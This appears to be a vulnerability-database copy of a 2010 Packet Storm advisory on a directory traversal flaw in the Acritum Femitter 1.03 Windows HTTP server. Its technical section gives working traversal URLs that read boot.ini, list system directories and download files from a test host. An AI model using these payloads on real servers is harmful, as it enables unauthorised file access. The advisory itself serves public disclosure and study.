Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDr_IDEPACKETSTORM:88717
HistoryApr 20, 2010 - 12:00 a.m.

Acritum Femitter 1.03 Directory Traversal

2010-04-2000:00:00
Dr_IDE
packetstormsecurity.com
20
JSON
`############################################################  
#  
# Acritum Femitter v1.03 Directory Traversal Exploit  
# Found By: Dr_IDE  
# Date: Apr. 20, 2010  
# Tested On: Windows 7  
# Download: http://acritum.com/fem/download.htm  
#  
############################################################  
  
- Description -  
  
Acritum Femitter v1.03 is a Windows based HTTP server. This is the latest  
version of the application available.  
  
Acritum Femitter v1.03 is vulnerable to remote directory traversal attack by the  
following means.  
  
- Technical Details -  
http://[webserver IP]/[\../]  
  
http://172.16.2.102////..%2f..%2f..%2f..%2fboot.ini <- File Access  
http://172.16.2.102////..%2f..%2f..%2f..%2fwindows/system32 <- Full Directory Listing  
http://172.16.2.102////..%2f..%2f..%2f..%2fwindows/system32/calc.exe <- File Download  
  
#[pocoftheday.blogspot.com]  
  
`
JSON